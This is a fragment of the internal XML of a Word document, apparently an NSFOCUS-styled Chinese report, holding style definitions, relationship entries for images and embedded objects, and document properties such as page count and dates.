    <w:link w:val="48"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="49"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="1260" w:leftChars="600"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="2100" w:leftChars="1000"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="3360" w:leftChars="1600"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="13"/>
    <w:next w:val="13"/>
    <w:link w:val="45"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="28">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="27"/>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30">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="29"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="folHlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="31">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="29"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="32">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="29"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="33">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="表格文本"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="decimal" w:pos="0"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="标题 7 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="标题 8 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="标题 9 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="批注文字 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="批注主题 Char"/>
    <w:basedOn w:val="44"/>
    <w:link w:val="26"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="50">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="51">
    <w:name w:val="正文（绿盟科技）"/>
    <w:link w:val="52"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="正文（绿盟科技） Char"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="51"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="parmname"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="uicontrol"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="55">
    <w:name w:val="QB表内文字"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="56">
    <w:name w:val="ueditor-content-p"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="57">
    <w:name w:val="标题 1（绿盟科技）"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="auto" w:sz="48" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="600" w:line="576" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="58">
    <w:name w:val="标题 2（绿盟科技）"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
      </w:tabs>
      <w:spacing w:line="412" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="59">
    <w:name w:val="标题 3（绿盟科技）"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:line="412" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="60">
    <w:name w:val="标题 4（绿盟科技）"/>
    <w:basedOn w:val="5"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
      </w:tabs>
      <w:spacing w:after="156" w:line="374" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="61">
    <w:name w:val="标题 5（有编号）（绿盟科技）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="156" w:line="376" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="62">
    <w:name w:val="标题 6（有编号）（绿盟科技）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="64" w:line="316" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="63">
    <w:name w:val="插图标注（绿盟科技）"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="64">
    <w:name w:val="表格标注（绿盟科技）"/>
    <w:basedOn w:val="63"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="Table Text Char"/>
    <w:link w:val="66"/>
    <w:qFormat/>
    <w:locked/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="66">
    <w:name w:val="Table Text"/>
    <w:link w:val="65"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="80" w:after="80"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow" w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="正文首行缩进（绿盟科技） Char"/>
    <w:link w:val="68"/>
    <w:qFormat/>
    <w:locked/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="68">
    <w:name w:val="正文首行缩进（绿盟科技）"/>
    <w:basedOn w:val="51"/>
    <w:link w:val="67"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="69">
    <w:name w:val="TOC 标题1"/>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70">
    <w:name w:val="列表（符号一级）（绿盟科技）"/>
    <w:basedOn w:val="51"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:ind w:left="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="71">
    <w:name w:val="列表（符号二级）（绿盟科技）"/>
    <w:basedOn w:val="70"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:ind w:left="1260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72">
    <w:name w:val="样式 宋体 黑色 段后: 7.8 磅"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:color w:val="000000"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="73">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="29"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="74">
    <w:name w:val="列出段落1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="75">
    <w:name w:val="im-content1"/>
    <w:basedOn w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="333333"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="76">
    <w:name w:val="列出段落2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="77">
    <w:name w:val="列出段落21"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="78">
    <w:name w:val="列表段落 字符"/>
    <w:basedOn w:val="29"/>
    <w:link w:val="79"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="79">
    <w:name w:val="msolistparagraph"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="78"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>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image" Target="media/image5.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject5.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject4.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><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AFAE1D-FF38-421E-BFCA-CDB65460B528}">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62</Pages>
  <Words>4939</Words>
  <Characters>28153</Characters>
  <Lines>234</Lines>
  <Paragraphs>66</Paragraphs>
  <TotalTime>250</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>33026</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2019-09-27T08:04:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-28T05:58:56Z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